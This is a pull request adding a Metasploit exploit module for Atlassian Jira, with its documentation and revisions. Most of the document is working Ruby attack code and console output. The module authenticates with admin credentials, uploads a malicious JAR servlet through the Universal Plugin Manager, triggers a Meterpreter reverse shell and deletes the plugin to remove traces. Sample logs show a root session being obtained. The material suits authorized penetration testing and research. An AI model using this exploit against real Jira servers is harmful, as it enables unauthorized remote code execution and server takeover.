### PR TITLE
Add Jira Authenticated Plugin Upload Module

### DIFF
--- a/documentation/modules/exploit/multi/http/jira_plugin_upload.md
+++ b/documentation/modules/exploit/multi/http/jira_plugin_upload.md
@@ -1,0 +1,211 @@
+## Description
+
+This module uses a POST request against against the Atlassian Jira Universal Plugin Manager (UPM) to upload a malicious Java servlet in the form of a JAR archive. Once uploaded the module executes the payload with a GET request and then cleans up after itself by deleting the plugin. Successful exploitation is dependent on valid credentials to an account that has access to the UPM (typically the admin account). The module includes a check function that will validate user supplied credentials and access to the UPM.
+
+## Vulnerable Application
+	
+The version of Atlassian Jira used for testing was 7.8.0 but the module should work for all versions of Jira as the main dependency is the implementation of Atlassian's UPM framework.
+
+To set up a vulnerable installation:
+1. Build the Atlassian SDK environment. Instructions can be found below:
+    - Windows:
+    https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/
+    - Linux/Mac:
+    https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/
+2. Create a shell Jira plugin and launch the SDK. Instructions can be found below:
+    - https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/
+3. Validate installation by browsing to localhost:2990/jira/ and logging in with the default credentials admin:admin
+
+
+
+## Verification Steps
+
+1. Install Atlassian SDK/Jira environment.
+2. Browse to localhost:2990/jira/ to confirm successful deployment.
+3. Start msfconsole: ```msfconsole -q```
+4. Do: ```use exploit/multi/http/jira_plugin_upload```
+5. Do: ```set rhost 127.0.0.1```
+6. Do: ```set rport 2990```
+7. Validate options: ```show options```
+8. Check credentials and UPM access: ```check```
+9. Do: ```exploit```
+10. You should get a shell.
+
+## Scenarios
+Successful exploitation:
+```
+msf > use exploit/multi/http/jira_plugin_upload
+msf exploit(multi/http/jira_plugin_upload) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf exploit(multi/http/jira_plugin_upload) > set rport 2990
+rport => 2990
+msf exploit(multi/http/jira_plugin_upload) > show options
+
+Module options (exploit/multi/http/jira_plugin_upload):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  admin            yes       The password for the specified username
+   HttpUsername  admin            yes       The username to authenticate as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST         127.0.0.1        yes       The target address
+   RPORT         2990             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /jira/           yes       The base URI to Jira
+   VHOST                          no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf exploit(multi/http/jira_plugin_upload) > check
+
+[*] Server accepted the credentials, user has access to plugin manager!
+[*] 127.0.0.1:2990 The target appears to be vulnerable.
+msf exploit(multi/http/jira_plugin_upload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Retrieving Session ID and XSRF token...
+[*] Attempting to upload UlDRthpT
+[*] Successfully uploaded UlDRthpT
+[*] Executing UlDRthpT
+[*] Deleting UlDRthpT
+[*] Sending stage (53837 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:43208) at 2018-02-25 13:45:43 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
+[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died
+msf exploit(multi/http/jira_plugin_upload) > 
+```
+Running check module with bad credentials:
+```msf exploit(multi/http/jira_plugin_upload) > show options
+
+Module options (exploit/multi/http/jira_plugin_upload):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  admin            yes       The password for the specified username
+   HttpUsername  password         yes       The username to authenticate as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST         127.0.0.1        yes       The target address
+   RPORT         2990             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /jira/           yes       The base URI to Jira
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  127.0.0.1        yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf exploit(multi/http/jira_plugin_upload) > check
+
+[-] Server rejected the credentials or the user doesn't have access to plugin manager!
+[*] 127.0.0.1:2990 Cannot reliably check exploitability.
+msf exploit(multi/http/jira_plugin_upload) > 
+```
+Attempting to exploit with bad credentials:
+```
+msf exploit(multi/http/jira_plugin_upload) > show options
+
+Module options (exploit/multi/http/jira_plugin_upload):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  admin            yes       The password for the specified username
+   HttpUsername  password         yes       The username to authenticate as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST         127.0.0.1        yes       The target address
+   RPORT         2990             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /jira/           yes       The base URI to Jira
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  127.0.0.1        yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf exploit(multi/http/jira_plugin_upload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Retrieving Session ID and XSRF token...
+[*] Attempting to upload evgjHaJf
+[*] Error uploading evgjHaJf
+[*] Exploit completed, but no session was created.
+msf exploit(multi/http/jira_plugin_upload) > 
+```
+Attempting to exploit with bad URI and/or victim IP:
+```
+msf exploit(multi/http/jira_plugin_upload) > show options
+
+Module options (exploit/multi/http/jira_plugin_upload):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  admin            yes       The password for the specified username
+   HttpUsername  password         yes       The username to authenticate as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST         127.0.0.1        yes       The target address
+   RPORT         2990             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /wronguri/       yes       The base URI to Jira
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  127.0.0.1        yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf exploit(multi/http/jira_plugin_upload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[-] Exploit aborted due to failure: unknown: Unable to access the web application
+[*] Exploit completed, but no session was created.
+msf exploit(multi/http/jira_plugin_upload) > 
+```

--- a/documentation/modules/exploit/multi/http/jira_plugin_upload.md
+++ b/documentation/modules/exploit/multi/http/jira_plugin_upload.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module uses a POST request against against the Atlassian Jira Universal Plugin Manager (UPM) to upload a malicious Java servlet in the form of a JAR archive. Once uploaded the module executes the payload with a GET request and then cleans up after itself by deleting the plugin. Successful exploitation is dependent on valid credentials to an account that has access to the UPM (typically the admin account). The module includes a check function that will validate user supplied credentials and access to the UPM.
+This module uses a POST request against the Atlassian Jira Universal Plugin Manager (UPM) to upload a malicious Java servlet in the form of a JAR archive. Once uploaded the module executes the payload with a GET request and then cleans up after itself by deleting the plugin. Successful exploitation is dependent on valid credentials to an account that has access to the UPM (typically the admin account). The module includes a check function that will validate user supplied credentials and access to the UPM.
 
 ## Vulnerable Application
 	
@@ -24,12 +24,10 @@ To set up a vulnerable installation:
 2. Browse to localhost:2990/jira/ to confirm successful deployment.
 3. Start msfconsole: ```msfconsole -q```
 4. Do: ```use exploit/multi/http/jira_plugin_upload```
-5. Do: ```set rhost 127.0.0.1```
-6. Do: ```set rport 2990```
-7. Validate options: ```show options```
-8. Check credentials and UPM access: ```check```
-9. Do: ```exploit```
-10. You should get a shell.
+5. Do: ```set rhost [IP]```
+6. Check credentials and UPM access: ```check```
+7. Do: ```exploit```
+8. You should get a shell.
 
 ## Scenarios
 Successful exploitation:
@@ -37,31 +35,6 @@ Successful exploitation:
 msf > use exploit/multi/http/jira_plugin_upload
 msf exploit(multi/http/jira_plugin_upload) > set rhost 127.0.0.1
 rhost => 127.0.0.1
-msf exploit(multi/http/jira_plugin_upload) > set rport 2990
-rport => 2990
-msf exploit(multi/http/jira_plugin_upload) > show options
-
-Module options (exploit/multi/http/jira_plugin_upload):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  admin            yes       The password for the specified username
-   HttpUsername  admin            yes       The username to authenticate as
-   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST         127.0.0.1        yes       The target address
-   RPORT         2990             yes       The target port (TCP)
-   SSL           false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /jira/           yes       The base URI to Jira
-   VHOST                          no        HTTP server virtual host
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Java Universal
-
-
 msf exploit(multi/http/jira_plugin_upload) > check
 
 [*] Server accepted the credentials, user has access to plugin manager!
@@ -85,127 +58,5 @@ meterpreter > exit
 
 [*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
 [*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died
-msf exploit(multi/http/jira_plugin_upload) > 
-```
-Running check module with bad credentials:
-```msf exploit(multi/http/jira_plugin_upload) > show options
-
-Module options (exploit/multi/http/jira_plugin_upload):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  admin            yes       The password for the specified username
-   HttpUsername  password         yes       The username to authenticate as
-   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST         127.0.0.1        yes       The target address
-   RPORT         2990             yes       The target port (TCP)
-   SSL           false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /jira/           yes       The base URI to Jira
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (java/meterpreter/reverse_tcp):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  127.0.0.1        yes       The listen address
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Java Universal
-
-
-msf exploit(multi/http/jira_plugin_upload) > check
-
-[-] Server rejected the credentials or the user doesn't have access to plugin manager!
-[*] 127.0.0.1:2990 Cannot reliably check exploitability.
-msf exploit(multi/http/jira_plugin_upload) > 
-```
-Attempting to exploit with bad credentials:
-```
-msf exploit(multi/http/jira_plugin_upload) > show options
-
-Module options (exploit/multi/http/jira_plugin_upload):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  admin            yes       The password for the specified username
-   HttpUsername  password         yes       The username to authenticate as
-   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST         127.0.0.1        yes       The target address
-   RPORT         2990             yes       The target port (TCP)
-   SSL           false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /jira/           yes       The base URI to Jira
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (java/meterpreter/reverse_tcp):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  127.0.0.1        yes       The listen address
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Java Universal
-
-
-msf exploit(multi/http/jira_plugin_upload) > exploit
-
-[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
-[*] Started reverse TCP handler on 127.0.0.1:4444 
-[*] Retrieving Session ID and XSRF token...
-[*] Attempting to upload evgjHaJf
-[*] Error uploading evgjHaJf
-[*] Exploit completed, but no session was created.
-msf exploit(multi/http/jira_plugin_upload) > 
-```
-Attempting to exploit with bad URI and/or victim IP:
-```
-msf exploit(multi/http/jira_plugin_upload) > show options
-
-Module options (exploit/multi/http/jira_plugin_upload):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  admin            yes       The password for the specified username
-   HttpUsername  password         yes       The username to authenticate as
-   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST         127.0.0.1        yes       The target address
-   RPORT         2990             yes       The target port (TCP)
-   SSL           false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI     /wronguri/       yes       The base URI to Jira
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (java/meterpreter/reverse_tcp):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  127.0.0.1        yes       The listen address
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Java Universal
-
-
-msf exploit(multi/http/jira_plugin_upload) > exploit
-
-[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
-[*] Started reverse TCP handler on 127.0.0.1:4444 
-[-] Exploit aborted due to failure: unknown: Unable to access the web application
-[*] Exploit completed, but no session was created.
 msf exploit(multi/http/jira_plugin_upload) > 
 ```

--- a/modules/exploits/multi/http/jira_plugin_upload.rb
+++ b/modules/exploits/multi/http/jira_plugin_upload.rb
@@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        Opt::RPORT(2990),
         OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
         OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
         OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
@@ -48,13 +49,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     unless access_login?
-      fail_with(Failure::Unknown, 'Unable to access the web application')
+      print_error(Failure::Unknown, 'Unable to access the web application')
     end
     auth_res = do_auth
     good_sid = get_sid(auth_res)
-    res = query_upm(good_sid)
+    good_cookie = 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+    res = query_upm(good_cookie)
 
-    if res.code == 302
+    if res && res.code == nil?
+      print_error('Unable to access the web application')
+      return CheckCode::Unknown
+    elsif res.code == 302
       print_error("Server rejected the credentials or the user doesn't have access to plugin manager!")
       return CheckCode::Unknown
     elsif res.code == 200
@@ -73,13 +78,14 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Retrieving Session ID and XSRF token...')
     auth_res = do_auth
     good_sid = get_sid(auth_res)
-    res = query_for_upm_token(good_sid)
+    good_cookie = 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+    res = query_for_upm_token(good_cookie)
     upm_token = get_upm_token(res)
-    upload_exec(upm_token, good_sid)
+    upload_exec(upm_token, good_cookie)
   end
 
   # Upload, execute, and remove servlet
-  def upload_exec(upm_token, good_sid)
+  def upload_exec(upm_token, good_cookie)
     contents = ''
     name = Rex::Text.rand_text_alpha(8)
 
@@ -129,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' =>
         {
           'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
-          'Cookie' => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+          'Cookie' => "#{good_cookie}"
         }
     }, 25)
 
@@ -141,22 +147,14 @@ class MetasploitModule < Msf::Exploit::Remote
       send_request_cgi({
         'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
         'method'       => 'GET',
-        'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
-        'headers'      => {
-        },
-        'vars_get' => {
-        }
+        'cookie'       => "#{good_cookie}"
       })
 
       print_status("Deleting #{name}")
       send_request_cgi({
         'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
         'method'       => 'DELETE',
-        'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
-        'headers'      => {
-        },
-        'vars_get' => {
-        }
+        'cookie'       => "#{good_cookie}"
       })
 
     else
@@ -181,29 +179,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # Queries plugin manager to verify access
-  def query_upm(good_sid)
+  def query_upm(good_cookie)
     res = send_request_cgi({
       'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),
       'method'       => 'GET',
-      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
-      'headers'      => {
-      },
-      'vars_get' => {
-      }
+      'cookie'       => "#{good_cookie}"
     })
     return res
   end
 
   # Queries API for response containing upm_token
-  def query_for_upm_token(good_sid)
+  def query_for_upm_token(good_cookie)
     res = send_request_cgi({
       'uri'          => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
       'method'       => 'GET',
-      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
-      'headers'      => {
-      },
-      'vars_get' => {
-      }
+      'cookie'       => "#{good_cookie}"
     })
     return res
   end

--- a/modules/exploits/multi/http/jira_plugin_upload.rb
+++ b/modules/exploits/multi/http/jira_plugin_upload.rb
@@ -1,0 +1,251 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Atlassian Jira Authenticated Upload Code Execution',
+      'Description' => %q{
+        This module can be used to execute a payload on Atlassian Jira via
+        the Universal Plugin Manager(UPM). The module requires valid login
+        credentials to an account that has access to the plugin manager.
+        The payload is uploaded as a JAR archive containing a servlet using
+        a POST request against the UPM component. The check command will
+        test the validity of user supplied credentials and test for access
+        to the plugin manager.
+      },
+      'Author'      => 'Alexander Gonzalez(dubfr33)',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+        ],
+      'Platform'    => %w[java],
+      'Targets'     =>
+        [
+          ['Java Universal',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'java'
+            }
+          ]
+        ],
+        'DisclosureDate' => 'Feb 22 2018'))
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
+        OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
+      ])
+  end
+
+  def check
+    unless access_login?
+      fail_with(Failure::Unknown, 'Unable to access the web application')
+    end
+    auth_res = do_auth
+    good_sid = get_sid(auth_res)
+    res = query_upm(good_sid)
+
+    if res.code == 302
+      print_error("Server rejected the credentials or the user doesn't have access to plugin manager!")
+      return CheckCode::Unknown
+    elsif res.code == 200
+      print_status('Server accepted the credentials, user has access to plugin manager!')
+      return CheckCode::Appears
+    else
+      print_status('Something went wrong, make sure host is up and options are correct!')
+      return CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    unless access_login?
+      fail_with(Failure::Unknown, 'Unable to access the web application')
+    end
+    print_status('Retrieving Session ID and XSRF token...')
+    auth_res = do_auth
+    good_sid = get_sid(auth_res)
+    res = query_for_upm_token(good_sid)
+    upm_token = get_upm_token(res)
+    upload_exec(upm_token, good_sid)
+  end
+
+  # Upload, execute, and remove servlet
+  def upload_exec(upm_token, good_sid)
+    contents = ''
+    name = Rex::Text.rand_text_alpha(8)
+
+    atlassian_plugin_xml = %Q{
+    <atlassian-plugin name="#{name}" key="#{name}" plugins-version="2">
+    <plugin-info>
+        <description></description>
+        <version>1.0</version>
+        <vendor name="" url="" />
+
+        <param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
+        <param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>
+
+    </plugin-info>
+
+    <servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
+        <description>"#{name}"</description>
+        <url-pattern>/metasploit/PayloadServlet</url-pattern>
+    </servlet>
+
+    </atlassian-plugin>
+    }
+
+    # Generates .jar file for upload
+    if target.name =~ /Java/
+      zip = payload.encoded_jar
+      zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+      servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+      zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+      contents = zip.pack
+    end
+
+    boundary = rand_text_numeric(27)
+
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
+    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
+    data << contents
+    data << "\r\n--#{boundary}--"
+
+    print_status("Attempting to upload #{name}")
+    res = send_request_raw({
+      'uri'     => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/?token=#{upm_token}"),
+      'method'  => 'POST',
+      'data'    => data,
+      'headers' =>
+        {
+          'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
+          'Cookie' => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+        }
+    }, 25)
+
+    if res && res.code == 202
+      print_status("Successfully uploaded #{name}")
+
+      print_status("Executing #{name}")
+      Rex::ThreadSafe.sleep(3)
+      send_request_cgi({
+        'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
+        'method'       => 'GET',
+        'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
+        'headers'      => {
+        },
+        'vars_get' => {
+        }
+      })
+
+      print_status("Deleting #{name}")
+      send_request_cgi({
+        'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
+        'method'       => 'DELETE',
+        'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
+        'headers'      => {
+        },
+        'vars_get' => {
+        }
+      })
+
+    else
+      print_status("Error uploading #{name}")
+      return
+    end
+  end
+
+  def access_login?
+    res = query_login
+    return false unless res && res.code == 200
+    @session_id = get_sid(res)
+    @xsrf_token = get_xsrf_token(res)
+    return true
+  end
+
+  # Sends GET request to login page so the HTTP response can be used
+  def query_login
+    path = normalize_uri(target_uri.path.to_s, 'login.jsp')
+    res = send_request_raw('uri' => path)
+    return res
+  end
+
+  # Queries plugin manager to verify access
+  def query_upm(good_sid)
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),
+      'method'       => 'GET',
+      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
+      'headers'      => {
+      },
+      'vars_get' => {
+      }
+    })
+    return res
+  end
+
+  # Queries API for response containing upm_token
+  def query_for_upm_token(good_sid)
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
+      'method'       => 'GET',
+      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
+      'headers'      => {
+      },
+      'vars_get' => {
+      }
+    })
+    return res
+  end
+
+  # Authenticates to webapp with user supplied credentials
+  def do_auth
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, 'login.jsp'),
+      'method'       => 'POST',
+      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + @session_id,
+      'headers'      => {
+      },
+      'vars_post' => {
+      'os_username' => datastore['HttpUsername'],
+      'os_password' => datastore['HttpPassword'],
+      'os_destination' => '',
+      'user_role' => '',
+      'atl_token' => '',
+      'login' => 'Log+In'
+       }
+     })
+    return res
+  end
+
+  # Finds SID from HTTP response headers
+  def get_sid(res = nil)
+    return '' if res.blank?
+    sid = res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+    return sid
+  end
+
+  def get_upm_token(res = nil)
+    return '' if res.blank?
+    upm_token = res.headers['upm-token']
+    return upm_token
+  end
+
+  # Finds XSRF token in html on login page
+  def get_xsrf_token(res = nil)
+    return '' if res.blank?
+    meta_html = res.get_html_document
+    xsrf_token = meta_html.at('meta[@id="atlassian-token"]')['content']
+    return xsrf_token
+  end
+end


### PR DESCRIPTION
Add Jira Authenticated Plugin Upload Module

The module executes a payload on Atlassian Jira via the Universal Plugin Manager(UPM). Any
user that has successfully authenticated to Jira and has access to the UPM (typically the admin account) can upload a Java servlet in the form of a JAR archive to achieve code execution. 

## Test Environment Setup

- First, build the Atlassian SDK environment. Instructions can be found below:

    - Windows:
    https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/
    - Linux/Mac:
https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/

- Next, create a shell Jira plugin and launch the SDK. Instructions can be found below:

    - https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/

Once these steps are completed you should be able to browse to localhost:2990/jira/ to confirm successful deployment. The default credentials are admin:admin.

## Verification

- [ ] Install Atlassian SDK/Jira environment
- [ ] Browse to localhost:2990/jira/ to confirm successful deployment
- [ ] msfconsole -q
- [ ] use exploit/multi/http/jira_plugin_upload
- [ ] show options
- [ ] set rhost 127.0.0.1
- [ ] set rport 2990
- [ ] check
- [ ] exploit

## Example Output
```
msf > use exploit/multi/http/jira_plugin_upload
msf exploit(multi/http/jira_plugin_upload) > show options

Module options (exploit/multi/http/jira_plugin_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  admin            yes       The password for the specified username
   HttpUsername  admin            yes       The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /jira/           yes       The base URI to Jira
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(multi/http/jira_plugin_upload) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(multi/http/jira_plugin_upload) > set rport 2990
rport => 2990
msf exploit(multi/http/jira_plugin_upload) > check

[*] Server accepted the credentials, user has access to plugin manager!
[*] 127.0.0.1:2990 The target appears to be vulnerable.
msf exploit(multi/http/jira_plugin_upload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Retrieving Session ID and XSRF token...
[*] Attempting to upload IomGrXWU
[*] Successfully uploaded IomGrXWU
[*] Executing IomGrXWU
[*] Deleting IomGrXWU
[*] Sending stage (53837 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:34056) at 2018-02-22 11:20:54 -0500

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(multi/http/jira_plugin_upload) > 
```
